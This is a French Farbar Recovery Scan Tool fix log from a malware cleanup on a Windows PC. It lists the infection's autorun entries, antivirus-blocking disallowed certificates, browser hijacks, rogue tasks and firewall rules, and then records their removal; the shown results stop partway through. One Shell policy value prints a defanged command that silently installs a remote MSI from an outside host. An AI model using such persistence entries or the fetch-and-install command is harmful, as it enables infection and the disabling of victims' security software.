Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 20-08-2017
Exécuté par clément (28-08-2017 12:03:10) Run:1
Exécuté depuis C:\Users\clément\Desktop
Profils chargés: clément (Profils disponibles: clément)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************

CreateRestorePoint:
CloseProcesses:
() C:\Windows\Temp\g488B.tmp.exe
() C:\Users\clément\AppData\Local\Temp\San7706.tmp
HKLM\...\Run: [gplyra] => C:\Users\clément\AppData\Roaming\gplyra\gplyra.exe [1533440 2017-04-24] ()
HKLM\...\RunOnce: [DESKTOP-OT6J254] => C:\Windows\Temp\g22D0.tmp.exe [245760 2017-08-27] ()
HKLM\ DisallowedCertificates: 03D22C9C66915D58C88912B64C1F984B8344EF09 (Comodo Security Solutions)
HKLM\ DisallowedCertificates: 0F684EC1163281085C6AF20528878103ACEFCAAB (F-Secure Corporation)
HKLM\ DisallowedCertificates: 1667908C9E22EFBD0590E088715CC74BE4C60884 (FRISK Software International/F-Prot)
HKLM\ DisallowedCertificates: 18DEA4EFA93B06AE997D234411F3FD72A677EECE (Bitdefender SRL)
HKLM\ DisallowedCertificates: 2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF (G DATA Software AG)
HKLM\ DisallowedCertificates: 249BDA38A611CD746A132FA2AF995A2D3C941264 (Malwarebytes Corporation)
HKLM\ DisallowedCertificates: 31AC96A6C17C425222C46D55C3CCA6BA12E54DAF (Symantec Corporation)
HKLM\ DisallowedCertificates: 331E2046A1CCA7BFEF766724394BE6112B4CA3F7 (Trend Micro)
HKLM\ DisallowedCertificates: 3353EA609334A9F23A701B9159E30CB6C22D4C59 (Webroot Inc.)
HKLM\ DisallowedCertificates: 373C33726722D3A5D1EDD1F1585D5D25B39BEA1A (SUPERAntiSpyware.com)
HKLM\ DisallowedCertificates: 3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F (Kaspersky Lab)
HKLM\ DisallowedCertificates: 3D496FA682E65FC122351EC29B55AB94F3BB03FC (AVG Technologies CZ)
HKLM\ DisallowedCertificates: 4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 (PC Tools)
HKLM\ DisallowedCertificates: 42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 (K7 Computing Pvt Ltd)
HKLM\ DisallowedCertificates: 4420C99742DF11DD0795BC15B7B0ABF090DC84DF (Doctor Web Ltd.)
HKLM\ DisallowedCertificates: 4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF (Emsisoft Ltd)
HKLM\ DisallowedCertificates: 5240AB5B05D11B37900AC7712A3C6AE42F377C8C (Check Point Software Technologies Ltd.)
HKLM\ DisallowedCertificates: 5DD3D41810F28B2A13E9A004E6412061E28FA48D (Emsisoft Ltd)
HKLM\ DisallowedCertificates: 7457A3793086DBB58B3858D6476889E3311E550E (K7 Computing Pvt Ltd)
HKLM\ DisallowedCertificates: 76A9295EF4343E12DFC5FE05DC57227C1AB00D29 (BullGuard Ltd)
HKLM\ DisallowedCertificates: 775B373B33B9D15B58BC02B184704332B97C3CAF (McAfee)
HKLM\ DisallowedCertificates: 872CD334B7E7B3C3D1C6114CD6B221026D505EAB (Comodo Security Solutions)
HKLM\ DisallowedCertificates: 88AD5DFE24126872B33175D1778687B642323ACF (McAfee)
HKLM\ DisallowedCertificates: 9132E8B079D080E01D52631690BE18EBC2347C1E (Adaware Software)
HKLM\ DisallowedCertificates: 982D98951CF3C0CA2A02814D474A976CBFF6BDB1 (Safer Networking Ltd.)
HKLM\ DisallowedCertificates: 9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 (Webroot Inc.)
HKLM\ DisallowedCertificates: 9C43F665E690AB4D486D4717B456C5554D4BCEB5 (ThreatTrack Security)
HKLM\ DisallowedCertificates: 9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 (CURIOLAB S.M.B.A.)
HKLM\ DisallowedCertificates: A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 (Avira Operations GmbH & Co. KG)
HKLM\ DisallowedCertificates: A5341949ABE1407DD7BF7DFE75460D9608FBC309 (BullGuard Ltd)
HKLM\ DisallowedCertificates: A59CC32724DD07A6FC33F7806945481A2D13CA2F (ESET)
HKLM\ DisallowedCertificates: AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 (AVG Technologies CZ)
HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software)
HKLM\ DisallowedCertificates: AD96BB64BA36379D2E354660780C2067B81DA2E0 (Symantec Corporation)
HKLM\ DisallowedCertificates: B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 (Malwarebytes Corporation)
HKLM\ DisallowedCertificates: CDC37C22FE9272D8F2610206AD397A45040326B8 (Trend Micro)
HKLM\ DisallowedCertificates: D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 (Kaspersky Lab)
HKLM\ DisallowedCertificates: DB303C9B61282DE525DC754A535CA2D6A9BD3D87 (ThreatTrack Security)
HKLM\ DisallowedCertificates: DB77E5CFEC34459146748B667C97B185619251BA (Avast Antivirus/Software)
HKLM\ DisallowedCertificates: E22240E837B52E691C71DF248F12D27F96441C00 (Total Defense, Inc.)
HKLM\ DisallowedCertificates: E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF (AVG Technologies CZ)
HKLM\ DisallowedCertificates: ED841A61C0F76025598421BC1B00E24189E68D54 (Bitdefender SRL)
HKLM\ DisallowedCertificates: F83099622B4A9F72CB5081F742164AD1B8D048C9 (ESET)
HKLM\ DisallowedCertificates: FBB42F089AF2D570F2BF6F493D107A3255A9BB1A (Panda Security S.L)
HKLM\ DisallowedCertificates: FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Run: [NrxQ4wYKTD9lbn.exe] => C:\Users\clément\AppData\Local\7ab808e7e265451a9a961b49b0ef77d8\NrxQ4wYKTD9lbn.exe 
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Run: [nXup0B4OdvyH0.exe] => C:\Users\clément\AppData\Local\2fc67d35b08c4665bd605658465b1d3c\nXup0B4OdvyH0.exe -r1_1 -r2_2
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Run: [setupsk_upd] => "C:\Users\CLMENT~1\AppData\Roaming\SETUPS~1\python\pythonw.exe" "C:\Users\CLMENT~1\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd"
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Run: [setupsk] => "C:\Users\CLMENT~1\AppData\Roaming\setupsk\python\pythonw.exe" "C:\Users\CLMENT~1\AppData\Roaming\setupsk\ml.py" --APPNAME="setupsk"
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Run: [r7NastVh.exe] => C:\Users\clément\AppData\Local\Temp\16e080999d3541fb97c0546f7f34cf5d\r7NastVh.exe
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Run: [kq6SJhy3.exe] => C:\Users\clément\AppData\Local\Temp\72e02b539d8d4c2195db3ab4dee2b5a1\kq6SJhy3.exe -r1_1 -r2_2
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\RunOnce: [Jw-H1hKwj9.exe] => C:\Program Files\Microsoft Office\84C16TR0YQZX5TRFKZERKF1\Jw-H1hKwj9.exe [422400 2017-08-26] ()
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xNdMxNkIcRYIxMjF2FTIcNWJQNjFcOWI3Mdw1RWJLFF== /q
GroupPolicy: Restriction - Chrome
GroupPolicy\User: Restriction
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www-searching.com/?pid=s&s=H8Rzbcnbl1BU,dda26193-3659-4a64-ae9e-9e2979d718df,&vp=ch&prd=set_ie
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493283123&z=2822dde04eba1d71ec1819ag3z6t9c6o0b7c9g9c7e&from=che0812&uid=TOSHIBAXTHNSNJ128G8NU_758ZZ06RKFHXZ06RKFHX
SearchScopes: HKU\S-1-5-21-253373114-394791922-1694590359-1001 -> {29BBDE1B-EB8D-478D-8B3B-016B68320D6A} URL = hxxps://fr.search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=994519&p={searchTerms}
SearchScopes: HKU\S-1-5-21-253373114-394791922-1694590359-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493283123&z=2822dde04eba1d71ec1819ag3z6t9c6o0b7c9g9c7e&from=che0812&uid=TOSHIBAXTHNSNJ128G8NU_758ZZ06RKFHXZ06RKFHX&q={searchTerms}
SearchScopes: HKU\S-1-5-21-253373114-394791922-1694590359-1001 -> {C74A07A0-FCF0-4AC1-BE75-EFFDA5C090DA} URL = hxxp://www-searching.com/s.ashx?prd=opensearch&q={searchTerms}&s=H8Rzbcnbl1BU,dda26193-3659-4a64-ae9e-9e2979d718df,
SearchScopes: HKU\S-1-5-21-253373114-394791922-1694590359-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7BA4AD114E-0FC1-4B1E-AF73-053768F9FB26%7D&gp=811014
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\lqzojfuf.default -> Поиск@Mail.Ru
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\lqzojfuf.default -> Поиск@Mail.Ru
FF Homepage: Mozilla\Firefox\Profiles\lqzojfuf.default -> hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h8rzbcnbl1bu,dda26193-3659-4a64-ae9e-9e2979d718df,
FF NewTab: Mozilla\Firefox\Profiles\lqzojfuf.default -> hxxp://www-searching.com/?site=shyosffdefault&prd=set_ff&s=h8rzbcnbl1bu,dda26193-3659-4a64-ae9e-9e2979d718df,
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-03-10]
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\aohghmighlieiainnegkcijnfilokake [2016-03-10]
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-03-10]
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-03-10]
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-03-10]
CHR Extension: (Pas de nom) - C:\Users\clément\AppData\Local\Google\Chrome\User Data\ChromeDefaultData2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe
HKU\S-1-5-21-253373114-394791922-1694590359-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe
S2 BIT; C:\ProgramData\BIT\BIT.dll [X]
S2 OtherSearch; rundll32.exe "C:\Program Files (x86)\fvALoswjMn\kl.dll",Svc [X]
R3 SMUpdd; C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys [52992 2017-08-28] ()
2017-08-27 16:32 - 2017-08-28 02:10 - 000349184 _____ C:\ProgramData\smp2.exe
2017-08-27 16:32 - 2017-08-27 16:32 - 000000000 ____D C:\Program Files (x86)\8fdCaBIXshPn
2017-08-27 16:29 - 2017-08-27 20:57 - 000000414 _____ C:\WINDOWS\Tasks\Updater_Online_Application.job
2017-08-27 16:32 - 2017-08-28 02:11 - 000004430 _____ C:\WINDOWS\System32\Tasks\SMW_UpdateTask_Time_323131373234303836342d504a2d414534372a5a6c785a
2017-08-26 12:16 - 2017-08-27 15:26 - 000001500 _____ C:\Users\clément\Desktop\Поиcк в Интeрнете.lnk
2017-08-26 12:16 - 2017-08-26 12:16 - 000000000 ____D C:\Users\clément\AppData\Local\Поиcк в Интeрнете
2017-08-26 12:14 - 2017-08-26 17:45 - 000000326 _____ C:\WINDOWS\Tasks\uuxHwpnMkRCRpJh.job
2017-08-26 12:14 - 2017-08-26 17:44 - 000003202 _____ C:\WINDOWS\System32\Tasks\TnqpiRJoXWMCwN
2017-08-26 12:14 - 2017-08-26 17:44 - 000002866 _____ C:\WINDOWS\System32\Tasks\uuxHwpnMkRCRpJh2
2017-08-26 12:14 - 2017-08-26 17:44 - 000002646 _____ C:\WINDOWS\System32\Tasks\uuxHwpnMkRCRpJh
2017-08-26 12:13 - 2017-08-26 17:43 - 000000000 ____D C:\Users\clément\AppData\Local\7ab808e7e265451a9a961b49b0ef77d8
2017-08-26 12:13 - 2017-08-26 17:43 - 000000000 ____D C:\Users\clément\AppData\Local\2fc67d35b08c4665bd605658465b1d3c
2017-08-26 12:13 - 2017-08-26 12:55 - 000000000 ____D C:\Users\clément\AppData\Local\c2adc913dfa241e8b171d92b7c36524e
2017-08-26 12:12 - 2017-08-26 12:12 - 000000193 _____ C:\Users\clément\Desktop\Искать в Интернете.url
2017-08-25 14:34 - 2017-08-25 14:34 - 001287680 _____ C:\WINDOWS\62ecf9df28efb411595ec052a5ab1411.exe
2017-08-25 14:34 - 2017-08-25 14:34 - 000078744 _____ (9FNJ5N) C:\WINDOWS\system32\Drivers\4bc9434eabe7ae6262307ce569896941.sys
C:\Users\clément\AppData\Roaming\gplyra\gplyra.exe
C:\Windows\Temp\g22D0.tmp.exe
C:\ProgramData\smp2.exe
2017-08-26 12:37 - 2017-08-26 12:37 - 001926648 _____ () C:\Users\clément\AppData\Local\Temp\0PElKGkBfiep.exe
2017-08-26 12:25 - 2017-08-26 12:25 - 001926648 _____ () C:\Users\clément\AppData\Local\Temp\7nfIWjFPkFOn.exe
2017-08-26 17:26 - 2017-08-26 17:26 - 000223744 _____ (Un4seen Developments) C:\Users\clément\AppData\Local\Temp\Bass.dll
2017-08-26 17:25 - 2017-08-26 17:25 - 000647168 _____ (radio42) C:\Users\clément\AppData\Local\Temp\Bass.Net.dll
2017-08-26 17:34 - 2017-08-26 17:34 - 000003072 _____ () C:\Users\clément\AppData\Local\Temp\CH.dll
2017-08-27 12:49 - 2017-07-11 02:32 - 001930320 _____ (Microsoft Corporation) C:\Users\clément\AppData\Local\Temp\dllnt_dump.dll
2017-08-26 12:34 - 2017-08-26 12:34 - 000911083 _____ (                                                            ) C:\Users\clément\AppData\Local\Temp\Dxx2AtYBegoK.exe
2017-08-26 12:24 - 2017-08-26 12:24 - 001926648 _____ () C:\Users\clément\AppData\Local\Temp\fBb6Vj4fXUzS.exe
2017-08-26 12:23 - 2017-08-26 12:23 - 004568355 _____ () C:\Users\clément\AppData\Local\Temp\IHRG0VO4PBcn.exe
2017-08-26 12:18 - 2017-08-26 12:20 - 052959376 _____ (WeMod) C:\Users\clément\AppData\Local\Temp\Infinity-Setup.exe
2017-08-26 12:13 - 2017-08-26 12:13 - 000911083 _____ (                                                            ) C:\Users\clément\AppData\Local\Temp\JdbKIpb6vI0f.exe
2017-08-26 12:12 - 2017-08-26 12:12 - 002589912 _____ () C:\Users\clément\AppData\Local\Temp\JT7ZHmgGYbIF.exe
2017-08-26 12:44 - 2017-08-26 12:44 - 001926648 ____N () C:\Users\clément\AppData\Local\Temp\kYJgxC6gFnlK.exe
2017-08-26 12:41 - 2017-08-26 12:41 - 038316032 ____N (The Chromium Authors) C:\Users\clément\AppData\Local\Temp\NCqIsMlXm77C.exe
2017-08-26 12:36 - 2017-08-26 12:37 - 008670208 _____ () C:\Users\clément\AppData\Local\Temp\NQXP3X5pqegX.exe
2017-08-26 12:16 - 2017-08-26 12:16 - 001926648 _____ () C:\Users\clément\AppData\Local\Temp\O9AnFlIA66Dd.exe
2017-08-26 12:22 - 2017-08-26 12:22 - 038316032 _____ (The Chromium Authors) C:\Users\clément\AppData\Local\Temp\OWrBOy3ApMNH.exe
2017-08-26 12:43 - 2017-08-26 12:43 - 001926648 _____ () C:\Users\clément\AppData\Local\Temp\oylIeKJHIOG2.exe
2017-08-26 12:23 - 2017-08-26 12:23 - 064938720 _____ (Kometa LCC) C:\Users\clément\AppData\Local\Temp\r49hvX0ufQBZ.exe
2017-08-26 12:38 - 2017-08-26 12:38 - 000192000 _____ () C:\Users\clément\AppData\Local\Temp\U1qgVwRRQ8YV.exe
C:\Windows\Temp\g488B.tmp.exe
C:\Users\clément\AppData\Local\Temp\San7706.tmp
VidsqaurE (HKLM-x32\...\{A97606DF-0FE1-4390-B0DD-ADA8B303AE61}_is1) (Version: 1.4 - )
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> Pas de fichier
Task: {02EB31D7-2140-49E7-A2DA-A4C618D17A15} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2017-08-28] ()
Task: {2B630765-11F6-4BA6-91C1-7BD75E92351C} - System32\Tasks\IBUpd2 => C:\Users\clément\AppData\Local\BrowserAir\48.0.0.0\updater.exe [2016-06-30] ()
Task: {6CC0C9CE-7F1F-4603-9D8B-D009F34BD8CB} - System32\Tasks\TnqpiRJoXWMCwN => rundll32 "C:\Program Files (x86)\GXZiGyYLSHyU2\j7OauQX.dll",#1
Task: {7B628BCB-B7F5-4DAF-909A-28E68C04D9EB} - System32\Tasks\109b523744e1e28bdc9f2ee6afee13b8 => sc start 109b523744e1e28bdc9f2ee6afee13b8
Task: {B21D10A3-74FF-4AF7-A5AE-12AED634C7C2} - System32\Tasks\S3 IDI => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\S3 IDI\S3 IDI.dll",APBSgGlnPiRW
Task: {BBD25275-05BE-451E-9A15-6CE5D0547FA2} - System32\Tasks\Firetaskia => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Firetaskia\Firetaskia.dll",zlJWasOu
Task: {C01E1FAB-ECE6-415D-A7C6-14DB878A4EFE} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-06-18] (Microleaves)
Task: {C3046A84-442F-4681-939C-140D250BE270} - System32\Tasks\uuxHwpnMkRCRpJh2 => rundll32 "C:\Program Files (x86)\thzXuJvjU\VA2h1A3.dll",#1
Task: {D12A70F2-BDAB-47FB-895D-A7E2AD79FA5A} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD)
Task: {D26734E5-EFCD-4986-BD23-6A055E79BD4C} - System32\Tasks\IBUpd => C:\Users\clément\AppData\Local\BrowserAir\48.0.0.0\updater.exe [2016-06-30] ()
Task: {EC4C6F62-B9E6-45BD-A787-B3448B117F0C} - \Microsoft\Windows\Media Center\RegisterObject -> Pas de fichier
Task: C:\WINDOWS\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
Task: C:\WINDOWS\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
Task: C:\WINDOWS\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
Task: C:\WINDOWS\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe
Task: C:\WINDOWS\Tasks\uuxHwpnMkRCRpJh.job => C:\Program Files (x86)\thzXuJvjU\VA2h1A3.dll
Shortcut: C:\Users\clément\Desktop\Вoйти в Интeрнет.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
Shortcut: C:\Users\clément\Desktop\Поиcк в Интeрнете.lnk -> C:\Windows\explorer.exe (Microsoft Corporation)
ShortcutWithArgument: C:\Users\clément\Desktop\Logiciels\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h8rzbcnbl1bu,dda26193-3659-4a64-ae9e-9e2979d718df,
ShortcutWithArgument: C:\Users\clément\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=h8rzbcnbl1bu,dda26193-3659-4a64-ae9e-9e2979d718df,"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=h8rzbcnbl1bu,dda26193-3659-4a64-ae9e-9e2979d718df,
2017-08-27 23:03 - 2017-08-27 23:03 - 000568832 _____ () C:\WINDOWS\TEMP\g488B.tmp.exe
2017-08-28 02:10 - 2017-08-28 02:10 - 000473600 _____ () C:\Users\clément\AppData\Local\Temp\San7706.tmp
FirewallRules: [{21ECB531-57E9-4FE2-8D71-F70F6174AFC9}] => (Allow) C:\WINDOWS\system32\rundll32.exe
FirewallRules: [{9BDF2A52-A726-4A4D-A861-D6E13822B285}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{D5F22F3F-C49E-4E91-B603-25EA38CEF951}] => (Allow) C:\Windows\System32\rundll32.exe
EmptyTemp:

*****************

Erreur: (0) Impossible de créer un point de restauration.
Processus fermé avec succès.
C:\Windows\Temp\g488B.tmp.exe => Aucun processus actif trouvé
C:\Users\clément\AppData\Local\Temp\San7706.tmp => Aucun processus actif trouvé
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\gplyra => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\DESKTOP-OT6J254 => valeur supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9 => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A => clé supprimé(es) avec succès
HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 => clé supprimé(es) avec succès
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => clé supprimé(es) avec succès
HKU\S-1-5-21-253373114-394791922-1694590359-1001\Software\Microsoft\Windows\CurrentVersion\Run\\NrxQ4wYKTD9lbn.exe => valeur supprimé(es) avec succès
